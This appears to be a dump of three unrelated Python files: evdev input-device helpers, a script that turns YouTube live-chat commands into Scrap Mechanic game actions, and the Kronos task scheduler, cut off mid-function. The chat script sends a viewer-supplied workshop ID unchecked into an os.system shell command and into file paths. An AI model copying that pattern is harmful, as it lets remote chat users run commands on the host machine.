return evdev.ecodes.SW_LID in dev.capabilities().get(evdev.ecodes.EV_SW, [])
def IsTabletEventDevice(dev):
"""Check if a device is with EV_SW and SW_TABLET_MODE capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a tablet event device.
"""
return evdev.ecodes.SW_TABLET_MODE in dev.capabilities().get(
evdev.ecodes.EV_SW, [])
def IsKeyboardDevice(dev):
"""Check if a device is with EV_KEY and KEY_ENTER capabilities.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a keyboard device.
"""
keys = {
evdev.ecodes.KEY_ENTER,
evdev.ecodes.KEY_LEFTCTRL,
evdev.ecodes.KEY_LEFTALT
}
caps = set(dev.capabilities().get(evdev.ecodes.EV_KEY, []))
return keys.issubset(caps)
def SendKeys(key_sequence):
"""Sends the given key sequence through uinput.
Args:
key_sequence: A list of keys to send. For the list of valid key events, see
evdev.ecodes module.
"""
uinput = evdev.UInput()
for k in key_sequence:
uinput.write(evdev.ecodes.EV_KEY, k, 1)
for k in key_sequence:
uinput.write(evdev.ecodes.EV_KEY, k, 0)
uinput.syn()
uinput.close()
def IsTouchDevice(dev):
"""Check if a device is a touch device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touch device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return evdev.ecodes.BTN_TOUCH in keycaps
def IsStylusDevice(dev):
"""Check if a device is a stylus device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a stylus device.
"""
return FilterEvdevEcodes(dev, [[
evdev.ecodes.BTN_STYLUS,
evdev.ecodes.BTN_STYLUS2,
evdev.ecodes.BTN_TOOL_PEN]])
def IsTouchpadDevice(dev):
"""Check if a device is a touchpad device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touchpad device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return (evdev.ecodes.BTN_TOUCH in keycaps and
evdev.ecodes.BTN_MOUSE in keycaps)
def IsTouchscreenDevice(dev):
"""Check if a device is a touchscreen device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a touchscreen device.
"""
return (not IsTouchpadDevice(dev) and
evdev.ecodes.ABS_MT_SLOT in dict(
dev.capabilities().get(evdev.ecodes.EV_ABS, [])))
def IsMouseDevice(dev):
"""Check if a device is a mouse device.
Args:
dev: evdev.InputDevice
Returns:
True if dev is a mouse device.
"""
keycaps = dev.capabilities().get(evdev.ecodes.EV_KEY, [])
return (evdev.ecodes.BTN_MOUSE in keycaps and
evdev.ecodes.BTN_RIGHT in keycaps and
evdev.ecodes.BTN_MIDDLE in keycaps)
class FindDeviceError(RuntimeError):
"""An exception from FindDevice."""
def __init__(self, candidates, filtered_candidates) -> None:
super().__init__()
self.candidates = candidates
self.filtered_candidates = filtered_candidates
@staticmethod
def FormatDevice(dev):
return f'(path={dev.fn}, name={dev.name!r})'
@staticmethod
def FormatDevices(devices):
return str(sorted(map(FindDeviceError.FormatDevice, devices)))
def FormatFilteredCandidates(self):
return str({
key: self.FormatDevices(devices)
for key, devices in self.filtered_candidates
if devices
})
def __repr__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self.__str__())
class DeviceNotFoundError(FindDeviceError):
"""An exception which indicates there is no such device."""
_message_template = "Can't find device. Filtered candidates: {}."
def __str__(self) -> str:
return self._message_template.format(self.FormatFilteredCandidates())
class MultipleDevicesFoundError(FindDeviceError):
"""An exception which indicates there are multiple such devices."""
_message_template = ('Not having exactly one candidate! Left candidates: {}. '
'Filtered candidates: {}.')
def __str__(self) -> str:
return self._message_template.format(
self.FormatDevices(self.candidates), self.FormatFilteredCandidates())
def FindDevice(*args):
"""Find a device that match all arguments.
Args:
Each argument should be None (skipped), int (event id), str (pattern to
search in evdev name), or a filter function with domain evdev.InputDevice.
Returns:
An evdev.InputDevice
"""
candidates = GetDevices()
filtered_candidates = []
for item in args:
# pylint: disable=cell-var-from-loop
if item is None:
continue
if isinstance(item, int):
dev_filter = lambda dev: dev.fn == '/dev/input/event%d' % item
elif isinstance(item, str):
if item in evdev.ecodes.__dict__:
dev_filter = lambda dev: FilterEvdevEcodes(
dev, [[evdev.ecodes.__dict__[item]]])
else:
dev_filter = lambda dev: item in dev.name
elif callable(item):
dev_filter = item
else:
raise ValueError('Invalid argument %r' % item)
filtered_candidates.append(
(item,
[candidate for candidate in candidates if not dev_filter(candidate)]))
candidates = list(filter(dev_filter, candidates))
if len(candidates) == 1:
return candidates[0]
if not candidates:
raise DeviceNotFoundError(candidates, filtered_candidates)
raise MultipleDevicesFoundError(candidates, filtered_candidates)
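# Illustrative examples (editor's addition): FindDevice accepts any mix of event
# ids, name substrings / ecode names, and predicate functions, and the matching
# device must satisfy all of them. The devices below are hypothetical hardware.
#
#   touchpad = FindDevice(IsTouchpadDevice)                   # by predicate
#   keyboard = FindDevice('AT Translated', IsKeyboardDevice)  # name substring + predicate
#   event3   = FindDevice(3)                                  # /dev/input/event3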
def DeviceReopen(dev):
"""Reopen a device so that the event buffer is cleared.
Args:
dev: evdev.InputDevice
Returns:
A different evdev.InputDevice of the same device but with empty event
buffer.
"""
return evdev.InputDevice(dev.fn)
class InputDeviceDispatcher(asyncore.file_dispatcher):
"""Extends asyncore.file_dispatcher to read input device."""
def __init__(self, device, event_handler):
self.device = device
self.event_handler = event_handler
asyncore.file_dispatcher.__init__(self, device)
def handle_read(self):
# Spec - https://docs.python.org/2/library/asyncore.html mentions that
# recv() may raise socket.error with EAGAIN or EWOULDBLOCK, even though
# select.select() or select.poll() has reported the socket ready for
# reading.
#
# We have a similar issue here: the buffer might still be empty when
# reading from an input device even though asyncore calls handle_read().
# As a result, we call read_one() here because it returns None when the
# buffer is empty. If we instead called read() and iterated the returned
# generator object, an IOError (EAGAIN) might be thrown, but that
# behavior is not documented, so we can't rely on it.
while True:
event = self.device.read_one()
if event is None:
break
self.event_handler(event)
def writable(self):
return False
def StartDaemon(self):
"""Start a daemon thread forwarding events to event_handler."""
process_utils.StartDaemonThread(target=asyncore.loop)
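# Minimal dispatcher sketch (editor's addition, not part of the original module).
# Which device is found depends on the environment, so this is only a template;
# the handler is whatever callable the caller supplies.
def _example_watch_keyboard(event_handler):
    """Forward events from the first keyboard-like device to event_handler."""
    dev = FindDevice(IsKeyboardDevice)
    dispatcher = InputDeviceDispatcher(dev, event_handler)
    dispatcher.StartDaemon()
    return dispatcher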
|
readStream.py
|
import pytchat # most recent thing in the core is the updated stuff
import time
import json
import os
import sys
import copy
import requests
import threading
from winreg import *
import vdf
from shutil import copyfile
import shutil
# import smObjects
## This automatically finds the scrap mechanic installation
## and sets SM_Location appropriately
aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE)
aKey = OpenKey(aReg, r"SOFTWARE\WOW6432Node\Valve\Steam")
steamPathKey=str(QueryValueEx(aKey, "InstallPath"))
def formatRegKey(key):
return key.split(',')[0].replace('\'', '').replace('\\\\', '\\').replace('(C:', 'C:')
steamPath = formatRegKey(steamPathKey)
vdfFile = os.path.join(steamPath, "steamapps", "libraryfolders.vdf")
vdfFileContent = str(vdf.load(open(vdfFile))).replace('\'', '\"')
alternateSteamLibraries = json.loads(vdfFileContent)["LibraryFolders"]
SM_Location = os.path.join(steamPath, "steamapps", "common", "Scrap Mechanic")
i = 1
while(str(i) in alternateSteamLibraries):
path = os.path.join(alternateSteamLibraries[str(i)], "common", "Scrap Mechanic")
if os.path.isdir(path):
SM_Location = path
break
i = i + 1
###########################################################
# dir_path is the current directory
dir_path = os.path.dirname(os.path.realpath(__file__))
# commonly use sm folder locations
base = os.path.join(dir_path, "Scripts")
smBase = os.path.join(SM_Location, "Survival", "Scripts", "game")
dataBase = os.path.join(smBase, "StreamReaderData")
blueprintBase = os.path.join(dataBase, "blueprints")
# commonly used file locations
statOutput = os.path.join(dir_path, "DeathCounter.txt")
gameStats = os.path.join(dataBase, "gameStats.json")
# Import settings? for now have global settings
# TODO: Money pool to allow viewers to donate to a common goal
SETTINGS = {
'allFree': False, # make everything free
'sponsorFree': True, # channel sponsors get free commands
'TheGuyMode': True, # Special mode for TheGuy920
'fixedCost': 0, # if >0 and allFree == false, all commands will cost this price
'interval': 1, # rate at which to check for new commands, BROKEN until fixed...
'prefix': ['!','/','$','%'],
'filename': os.path.join(dataBase, 'streamchat.json'),
'videoID': "wLiGcFnUuD0",
'commands': { # list of commands and parameters, their prices are the values
'spawn': {
'totebot': 0,
'woc': 0,
'worm': 0,
'haybot': 0,
'tapebot': 0,
'redtapebot': 0,
'farmbot': 0,
},
'give':{ # give items to player (automatically gives stack if possible?)
'components': 0, # gives 10
'glowsticks': 0,
'ammo': 0
},
'kit': { # gives player specified kit
'seed': 0,
'food': 0,
'starter': 0,
'pipe': 0,
'meme': 0,
'bonk': 0
},
'aggro': 0, # aggro all nearby units to player
'kill': 2, # kill player instantly
'trip': 0, # Make player trip
'slap': 0,
'shield':0, # shield player for a brief amount of time
'rain': 0, # spawn a bunch of explosives in the air, could be random objects?
'raid': 0, # random raid at levels
'blast':0,
'heal': 0,
'fast':0,
'slow':0
},
'internalCommands':
{
'import':0
},
'single': ['raid', 'fast', 'slow','heal','shield','blast','trip','slap','aggro','rain'] # unnecessary, but a list of all single commands
}
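# Worked example (editor's note, values hypothetical): with the SETTINGS above,
# a chat message "!spawn totebot" is split into parameters = ['spawn', 'totebot'];
# validateCommand() (defined below) looks up SETTINGS['commands']['spawn']['totebot']
# and returns ('spawn', 'totebot', 0), and generateCommand() then builds the dict
# that gets queued for the game, with username/userid/amount taken from the chat
# message itself.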
def outputCommandQueue(commandQue):
# print("OUT=>", commandQue)
with open(SETTINGS['filename'], 'w') as outfile:
jsonMessage = json.dumps(commandQue)
# log("Writing commands",jsonMessage)
outfile.write(jsonMessage)
def addToQue(commands, handleCommand):
# adds to the already existing command que
# log(commands)
# Check if exists first
# log("addQWue",commands)
if not os.path.exists(SETTINGS['filename']):
f = open(SETTINGS['filename'], "a")
# make blank
f.write('[]')
f.close()
with open(SETTINGS['filename'], 'r') as inFile:
currentQue = json.load(inFile)
# log("Got Que",currentQue,"adding",commands)
# if empty? or check len too
if currentQue == None:
# Create empty list
currentQue = []
currentQue.extend(commands)
else:
currentQue.extend(commands)
# determines if the command should be handled or not
# unless this is being run from/after an internal command
# has executed, leave as default (True)
if handleCommand == True:
# TODO: get callback on success?
commandHandler(currentQue)
elif handleCommand == False:
# print("Sending Queue=>", currentQue)
outputCommandQueue(currentQue)
def commandHandler(commandQue):
# command handler will take 2 copies of the queue
commandList = copy.copy(commandQue)
# if the command type exists in internalCommands, it will be removed from the final execution
# and will be executed internally instead
for command in copy.copy(commandQue):
if command['type'] in SETTINGS['internalCommands']:
commandList.remove(command)
handleInternalCommand(command)
# if the command queue is not empty, update it
# after command has been handled, add it to the
# queue again, but do not handle it
if(len(commandList) > 0):
addToQue(commandList, False)
def handleInternalCommand(command):
# internal command handler
# yea, only got import as of now...
if command['type'] == "import":
try:
# init fileId
fileId = command['params']
# if the command parameters are a list (ie. not a string)
if not isinstance(command['params'], str):
fileId = command['params'][0]
# init blueprint.json file path and description file path
jsonFile = os.path.join(dir_path,"downloads",fileId,"blueprint.json").replace("\\\\", "\\")
descFile = os.path.join(dir_path,"downloads",fileId,"description.json").replace("\\\\", "\\")
# init destination file paths
jsonFileDest = os.path.join(blueprintBase, fileId+".blueprint")
descFileDest = os.path.join(blueprintBase, fileId+"-desc.json")
# checks to see if its already been downloaded
if not os.path.exists(jsonFileDest):
# downloads workshop item (most errors happen here)
downloadWorkshopItem(command)
# timeout guard for the polling loop below (up to timeOut iterations of the sleep)
timeOut = 100
errorCount = 0
# wait for file to exist or timeout
while (not os.path.exists(jsonFile)) and errorCount < timeOut:
errorCount += 1
time.sleep(0.05)
# copy blueprint and description file over to central folder
copyfile(jsonFile, jsonFileDest)
copyfile(descFile, descFileDest)
# gather json state (static versus dynamic)
state = 0.0
if len(command['params']) > 2:
state = getImportType(command['params'][2])
elif len(command['params']) > 1:
state = getImportType(command['params'][1])
# load the json blueprint
with open(jsonFileDest, 'r') as f:
jsonContent = json.loads(f.read())
# update the state
array = jsonContent["bodies"]
for i in range(len(array)):
array[i]["type"] = state
# save the json blueprint
with open(jsonFileDest, 'w') as json_file:
json.dump(jsonContent, json_file)
# create command queue
commandQue = []
commandQue.extend(toJson(command))
# update command queue
addToQue(commandQue, False)
except Exception as e:
# handle any download or file errors
logCommandError(e, command)
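# Example flow (editor's note, values hypothetical): an "!import 123456789" chat
# message reaches handleInternalCommand() as roughly
#   {'type': 'import', 'params': ['123456789'], ...}
# It downloads workshop item 123456789, waits for downloads/123456789/blueprint.json
# to appear, copies it into the blueprint folder as 123456789.blueprint, patches the
# body "type" field (static/dynamic), and re-queues the command for the game.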
def getImportType(string):
if (string == "static"):
return 1
else:
return 0
def logCommandError(e, command):
# print error
print(e)
# generate new log command
command['type'] = "log"
command['params'] = str(e)
commandQue = []
commandQue.extend(toJson(command))
# add log to queue (to send error msg to SM)
addToQue(commandQue, False)
def downloadWorkshopItem(command):
# configure the start params correctly
param = command['params']
# if start params is not a string (i.e. it's an array), configure it
if not isinstance(command['params'], str):
param = command['params'][0]
# configure node run command
startArgs = "node ./SteamWorkshopDownloader/index.js " + param + " \"" + SM_Location + "\" > log.txt"
# start node app to download workshop item
exitCode = os.system(startArgs)
# if app exits with error (69) alert of download failure
if exitCode == 69:
raise Exception("Failed To Download Workshop Item: {0}".format(str(command['params'])))
def generateCommand(command,parameter,cmdData): #Generates command dictionary
command = {'id': cmdData['id'], 'type':command, 'params':parameter, 'username': cmdData['author'],
'sponsor': cmdData['sponsor'], 'userid': cmdData['userid'], 'amount': cmdData['amount']}
# print("Generated command:",command)
return command
def validatePayment(command,price,message):
# Validate payment data for the specified command
# not necessary, just need price and message
if command != None:
if SETTINGS['allFree'] or (SETTINGS['sponsorFree'] and message['sponsor']) or ((SETTINGS['fixedCost'] >0 and message['amount'] >= SETTINGS['fixedCost']) or message['amount'] >= price) :
return True
elif message['amount'] < price:
print("Insuficcient payment",message['amount'],price)
return False
else:
log("Payment Failed")
return False
def validateCommand(parameters):
# {command is a array of parameters}
comType = str(parameters[0])
index = None
price = None
errorType = None
# if comType == None or index error then wth??
# Check if command valid first
if comType in SETTINGS['commands'] or comType in SETTINGS['internalCommands']:
# a single-line command with no extra params, e.g. kill, trip...
if len(parameters) == 1 or comType in SETTINGS['single']:
price = SETTINGS['commands'][comType]
#if an actual price
if type(price) is int:
return comType,index,price
# the command is supposed to have a parameter
else:
errorType = "Invalid parameter count"
return False,index,errorType
# command = with X parameters (max params is infinite for now)
elif len(parameters) > 1:
# grab the next index
index = str(parameters[1])
## do not uncomment these logs, you will get an error if you do
# log(SETTINGS['commands'][comType])
# log(index)
# Check for command type, or failure
if comType in SETTINGS['commands']:
# If valid item within that command
if index in SETTINGS['commands'][comType]:
# should be the maximum layer needed
price = SETTINGS['commands'][comType][index]
return comType,index,price
# added section for internally handled commands like the import command
elif comType in SETTINGS['internalCommands']:
return comType,parameters[1:],int(SETTINGS['internalCommands'][comType])
else:
errorType = "Index Invalid"
print("Unrecognized Index:",index)
else:
errorType = "Param Invalid"
print("Too many or not enought parameters",parameters)
else:
errorType = "Command Invalid"
print("unrecognized command",comType)
# Eventually have output error message
return False,index,errorType
def parseMessage(chat,mesID):
# parse any messages
comType = None
parameter = None
parsed = {'id': mesID, 'command': chat.message, 'author': chat.author.name, 'sponsor': chat.author.isChatSponsor, 'userid': chat.author.channelId, 'amount': chat.amountValue}
message = parsed['command'].lower()
# is actually a command # Possibly separate out to parsing function
if message[0] in SETTINGS['prefix']:
rawCommand = message.strip(message[0])
parameters = rawCommand.split() #TODO: More validation to fix any potential mistakes
# custom section for TheGuy920 and exclusive chat command ability
if chat.author.channelId == "UCbBBHW3dQkyw7-b1eBurnuQ" and parameters[0] == "chat" and SETTINGS['TheGuyMode'] == True: # special mode for TheGuy920
return generateCommand("chat",str(chat.message)[6:],parsed)
if len(parameters) == 0:
log("Only Recieved Prefix")
return None
comType,parameter,price = validateCommand(parameters)
if comType == False:
# possibly use index for details?
print("Received Error for",rawCommand+": ",price)
else:
# Now validate any payments
validPayment = validatePayment(comType,price,parsed)
if validPayment:
command = generateCommand(comType,parameter,parsed)
return command
else:
log("Invalid Payment")
# super chat section (no prefix but paid money)
elif chat.amountValue > 0:
return generateCommand("chat",str(chat.message),parsed)
return None
def readChat():
commandQue = []
cID = 0
while chat.is_alive():
# Also do stats reading/outputting
with open(gameStats, 'r') as inFile:
gameInfo = json.load(inFile)
# log("Got GameStats",gameStats)
with open(statOutput, 'w') as outfile:
deaths = gameInfo['deaths']
output = "Deaths: {:.0f}".format(deaths)
outfile.write(output)
# log("outputing",output)
for c in chat.get().sync_items():
# log(c.datetime,c.author.name,c.message)
command = parseMessage(c,cID)
if command != None:
commandQue.append(command)
cID +=1
if len(commandQue) >0:
addToQue(commandQue, True)
time.sleep(1)
commandQue = []
try:
chat.raise_for_status()
except Exception as e:
print(type(e), str(e))
commandList = '''
List of available commands:
1. clear-cache
> clears cached imports
2. reset-deaths
> resets the death counter
3. help
> displays this wonderful help message
'''
# 3. remove-mod
# > restores the original game files, clears the cache, and removes the deathcounter and other files
def internalConsoleCommand(command):
if(command == "clear-cache"):
shutil.rmtree(blueprintBase)
os.makedirs(blueprintBase)
log("import cache cleared")
elif(command == "reset-deaths"):
with open(gameStats, 'w') as outfile:
outfile.write('{ "deaths": 0, "bonks": 0, "robotKills": 0 }')
log("deaths reset")
elif(command == "remove-mod"):
print(commandList)
elif(command == "help"):
print(commandList)
else:
print("Unknown command, try typing 'help'")
def toJson(obj):
# this is basically the same as generateCommand, but I made another one for some reason
jsonContent = "[ {\"id\": "+str(obj["id"])+", \"type\": \""+str(obj["type"])+"\", \"params\": \""+str(obj["params"])+"\", \"username\": \""+str(obj["username"])+"\", \"sponsor\": "+str(obj["sponsor"]).lower()+", \"userid\": \""+str(obj["userid"])+"\", \"amount\": "+str(obj["amount"])+"} ]"
# special configuration if more than one parameter
if not isinstance(obj['params'], str):
params = "\""+"\",\"".join(obj["params"])+"\""
jsonContent = "[ {\"id\": "+str(obj["id"])+", \"type\": \""+str(obj["type"])+"\", \"params\": [ "+params+" ], \"username\": \""+str(obj["username"])+"\", \"sponsor\": "+str(obj["sponsor"]).lower()+", \"userid\": \""+str(obj["userid"])+"\", \"amount\": "+str(obj["amount"])+"} ]"
return json.loads(jsonContent)
# Planned commands: give speed, give slowness, lightning strike?, chop wood?
# chat = pytchat.create(video_id = SETTINGS['videoID']) # start reading livechat #Create it here?? or store in settings and generate on main()
chat = None
debug = False
# custom logging style (kinda dumb ngl)
def log(string):
print("["+str(string)+"]")
if __name__ == '__main__':
if debug:
pass
# debug stuff here
else:
# verify working video url
try:
try:
chat = pytchat.create(video_id=sys.argv[1])
SETTINGS['videoID'] = sys.argv[1]
except:
chat = pytchat.create(SETTINGS['videoID'])
except:
log("Video Id Failure")
ValidVideo = False
userIn = ''
while(not ValidVideo):
if len(userIn) > 0:
log('Video Id \'{0}\' is not valid'.format(userIn))
try:
userIn = input("YouTube Video Id => ")
chat = pytchat.create(video_id=userIn)
SETTINGS['videoID'] = userIn
ValidVideo = True
except:
pass
# print("Checking for backups...") maybe sum day :(
print("Installing Pre-Requisites...")
# create necessary files and folders if they do not exist
if not os.path.exists(dataBase):
os.makedirs(dataBase)
if not os.path.exists(blueprintBase):
os.makedirs(blueprintBase)
if not os.path.exists(statOutput):
open(statOutput, 'a').close()
if not os.path.exists(gameStats):
open(gameStats, 'a').close()
streamchatFile = open(os.path.join(dataBase, "streamchat.json"), "w")
streamchatFile.write("[]")
streamchatFile.close()
# install modded lua files
copyfile(os.path.join(base,"survival_streamreader.lua"), os.path.join(dataBase, "survival_streamreader.lua"))
copyfile(os.path.join(base,"BaseWorld.lua"), os.path.join(smBase, "worlds", "BaseWorld.lua"))
copyfile(os.path.join(base,"SurvivalGame.lua"), os.path.join(smBase, "SurvivalGame.lua"))
log("Stream Reader initialized")
# start the reader as thread
threading.Thread(target=readChat).start()
# listen for user commands
while(True):
internalConsoleCommand(input(""))
|
kronos.py
|
#!/usr/bin/python
"""Module that provides a cron-like task scheduler.
This task scheduler is designed to be used from inside your own program.
You can schedule Python functions to be called at specific intervals or
days. It uses the standard 'sched' module for the actual task scheduling,
but provides much more:
* repeated tasks (at intervals, or on specific days)
* error handling (exceptions in tasks don't kill the scheduler)
* optional to run scheduler in its own thread or separate process
* optional to run a task in its own thread or separate process
If the threading module is available, you can use the various Threaded
variants of the scheduler and associated tasks. If threading is not
available, you could still use the forked variants. If fork is also
not available, all processing is done in a single process, sequentially.
There are three Scheduler classes:
Scheduler ThreadedScheduler ForkedScheduler
You usually add new tasks to a scheduler using the add_interval_task or
add_daytime_task methods, with the appropriate processmethod argument
to select sequential, threaded or forked processing. NOTE: it is impossible
to add new tasks to a ForkedScheduler, after the scheduler has been started!
For more control you can use one of the following Task classes
and use schedule_task or schedule_task_abs:
IntervalTask ThreadedIntervalTask ForkedIntervalTask
SingleTask ThreadedSingleTask ForkedSingleTask
WeekdayTask ThreadedWeekdayTask ForkedWeekdayTask
MonthdayTask ThreadedMonthdayTask ForkedMonthdayTask
Kronos is the Greek God of Time.
Kronos scheduler (c) Irmen de Jong.
This version has been extracted from the Turbogears source repository
and slightly changed to be completely stand-alone again. Also some fixes
have been made to make it work on Python 2.6 (sched module changes).
The version in Turbogears is based on the original stand-alone Kronos.
This is open-source software, released under the MIT Software License:
http://www.opensource.org/licenses/mit-license.php
"""
__version__="2.0"
__all__ = [
"DayTaskRescheduler",
"ForkedIntervalTask",
"ForkedMonthdayTask",
"ForkedScheduler",
"ForkedSingleTask",
"ForkedTaskMixin",
"ForkedWeekdayTask",
"IntervalTask",
"MonthdayTask",
"Scheduler",
"SingleTask",
"Task",
"ThreadedIntervalTask",
"ThreadedMonthdayTask",
"ThreadedScheduler",
"ThreadedSingleTask",
"ThreadedTaskMixin",
"ThreadedWeekdayTask",
"WeekdayTask",
"add_interval_task",
"add_monthday_task",
"add_single_task",
"add_weekday_task",
"cancel",
"method",
]
import os
import sys
import sched
import time
import traceback
import weakref
import logging
class method:
sequential="sequential"
forked="forked"
threaded="threaded"
class Scheduler:
"""The Scheduler itself."""
def __init__(self):
self.running=True
self.sched = sched.scheduler(time.time, self.__delayfunc)
def __delayfunc(self, delay):
# This delay function is basically a time.sleep() that is
# divided up, so that we can check the self.running flag while delaying.
# there is an additional check in here to ensure that the top item of
# the queue hasn't changed
if delay<10:
time.sleep(delay)
else:
toptime = self._getqueuetoptime()
endtime = time.time() + delay
period = 5
stoptime = endtime - period
while self.running and stoptime > time.time() and \
self._getqueuetoptime() == toptime:
time.sleep(period)
if not self.running or self._getqueuetoptime() != toptime:
return
now = time.time()
if endtime > now:
time.sleep(endtime - now)
def _acquire_lock(self):
pass
def _release_lock(self):
pass
def add_interval_task(self, action, taskname, initialdelay, interval,
processmethod, args, kw):
"""Add a new Interval Task to the schedule.
A very short initialdelay or one of zero cannot be honored; you will
see a slight delay before the task is first executed. This is because
the scheduler needs to pick it up in its loop.
"""
if initialdelay < 0 or interval < 1:
raise ValueError("Delay or interval must be >0")
# Select the correct IntervalTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = IntervalTask
elif processmethod == method.threaded:
TaskClass = ThreadedIntervalTask
elif processmethod == method.forked:
TaskClass = ForkedIntervalTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, interval, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_single_task(self, action, taskname, initialdelay, processmethod,
args, kw):
"""Add a new task to the scheduler that will only be executed once."""
if initialdelay < 0:
raise ValueError("Delay must be >0")
# Select the correct SingleTask class. Not all types may be available!
if processmethod == method.sequential:
TaskClass = SingleTask
elif processmethod == method.threaded:
TaskClass = ThreadedSingleTask
elif processmethod == method.forked:
TaskClass = ForkedSingleTask
else:
raise ValueError("Invalid processmethod")
if not args:
args = []
if not kw:
kw = {}
task = TaskClass(taskname, action, args, kw)
self.schedule_task(task, initialdelay)
return task
def add_daytime_task(self, action, taskname, weekdays, monthdays, timeonday,
processmethod, args, kw):
"""Add a new Day Task (Weekday or Monthday) to the schedule."""
if weekdays and monthdays:
raise ValueError("You can only specify weekdays or monthdays, "
"not both")
if not args:
args = []
if not kw:
kw = {}
if weekdays:
# Select the correct WeekdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = WeekdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedWeekdayTask
elif processmethod == method.forked:
TaskClass = ForkedWeekdayTask
else:
raise ValueError("Invalid processmethod")
task=TaskClass(taskname, weekdays, timeonday, action, args, kw)
if monthdays:
# Select the correct MonthdayTask class.
# Not all types may be available!
if processmethod == method.sequential:
TaskClass = MonthdayTask
elif processmethod == method.threaded:
TaskClass = ThreadedMonthdayTask
elif processmethod == method.forked:
TaskClass = ForkedMonthdayTask
else:
raise ValueError("Invalid processmethod")
task=TaskClass(taskname, monthdays, timeonday, action, args, kw)
firsttime=task.get_schedule_time(True)
self.schedule_task_abs(task, firsttime)
return task
def schedule_task(self, task, delay):
"""Add a new task to the scheduler with the given delay (seconds).
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),) )
finally:
self._release_lock()
else:
task.event = self.sched.enter(delay, 0, task,
(weakref.ref(self),) )
def schedule_task_abs(self, task, abstime):
"""Add a new task to the scheduler for the given absolute time value.
Low-level method for internal use.
"""
if self.running:
# lock the sched queue, if needed
self._acquire_lock()
try:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),) )
finally:
self._release_lock()
else:
task.event = self.sched.enterabs(abstime, 0, task,
(weakref.ref(self),) )
def start(self):
"""Start the scheduler."""
self._run()
def stop(self):
"""Remove all pending tasks and stop the Scheduler."""
self.running = False
self._clearschedqueue()
def cancel(self, task):
"""Cancel given scheduled task."""
self.sched.cancel(task.event)
if sys.version_info>=(2,6):
# code for sched module of python 2.6+
def _getqueuetoptime(self):
try:
return self.sched._queue[0].time
except IndexError:
return 0.0
def _clearschedqueue(self):
self.sched._queue[:] = []
else:
# code for sched module of python 2.5 and older
def _getqueuetoptime(self):
try:
return self.sched.queue[0][0]
except IndexError:
return 0.0
def _clearschedqueue(self):
self.sched.queue[:] = []
def _run(self):
# Low-level run method to do the actual scheduling loop.
while self.running:
try:
self.sched.run()
except Exception,x:
logging.error("ERROR DURING SCHEDULER EXECUTION %s" % str(x), exc_info=True)
# queue is empty; sleep a short while before checking again
if self.running:
time.sleep(5)
class Task:
"""Abstract base class of all scheduler tasks"""
def __init__(self, name, action, args, kw):
"""This is an abstract class!"""
self.name=name
self.action=action
self.args=args
self.kw=kw
def __call__(self, schedulerref):
"""Execute the task action in the scheduler's thread."""
try:
self.execute()
except Exception,x:
self.handle_exception(x)
self.reschedule(schedulerref())
def reschedule(self, scheduler):
"""This method should be defined in one of the sub classes!"""
raise NotImplementedError("You're using the abstract base class 'Task',"
" use a concrete class instead")
def execute(self):
"""Execute the actual task."""
self.action(*self.args, **self.kw)
def handle_exception(self, exc):
"""Handle any exception that occured during task execution."""
logging.error("ERROR DURING SCHEDULER EXECUTION %s" % str(exc), exc_info=True)
class SingleTask(Task):
"""A task that only runs once."""
def reschedule(self, scheduler):
pass
class IntervalTask(Task):
"""A repeated task that occurs at certain intervals (in seconds)."""
def __init__(self, name, interval, action, args=None, kw=None):
Task.__init__(self, name, action, args, kw)
self.interval = interval
def reschedule(self, scheduler):
"""Reschedule this task according to its interval (in seconds)."""
scheduler.schedule_task(self, self.interval)
class DayTaskRescheduler:
"""A mixin class that contains the reschedule logic for the DayTasks."""
def __init__(self, timeonday):
self.timeonday = timeonday
def get_schedule_time(self, today):
"""Calculate the time value at which this task is to be scheduled."""
now = list(time.localtime())
if today:
# schedule for today. let's see if that is still possible
if (now[3], now[4]) >= self.timeonday:
# too bad, it will be tomorrow
now[2] += 1
else:
# tomorrow
now[2] += 1
# set new time on day (hour,minute)
now[3], now[4] = self.timeonday
# seconds
now[5] = 0
return time.mktime(now)
def reschedule(self, scheduler):
"""Reschedule this task according to the daytime for the task.
The task is scheduled for tomorrow, for the given daytime.
"""
# (The execute method in the concrete Task classes will check
# if the current day is a day on which the task must run).
abstime = self.get_schedule_time(False)
scheduler.schedule_task_abs(self, abstime)
class WeekdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a week (1-7), at a fixed time
on the day.
"""
def __init__(self, name, weekdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(weekdays) not in (list, tuple):
raise TypeError("weekdays must be a sequence of weekday numbers "
"1-7 (1 is Monday)")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = weekdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the week).
weekday = time.localtime().tm_wday + 1
if weekday in self.days:
self.action(*self.args, **self.kw)
class MonthdayTask(DayTaskRescheduler, Task):
"""A task that is called at specific days in a month (1-31), at a fixed
time on the day.
"""
def __init__(self, name, monthdays, timeonday, action, args=None, kw=None):
if type(timeonday) not in (list, tuple) or len(timeonday) != 2:
raise TypeError("timeonday must be a 2-tuple (hour,minute)")
if type(monthdays) not in (list, tuple):
raise TypeError("monthdays must be a sequence of monthdays numbers "
"1-31")
DayTaskRescheduler.__init__(self, timeonday)
Task.__init__(self, name, action, args, kw)
self.days = monthdays
def execute(self):
# This is called every day, at the correct time. We only need to
# check if we should run this task today (this day of the month).
if time.localtime().tm_mday in self.days:
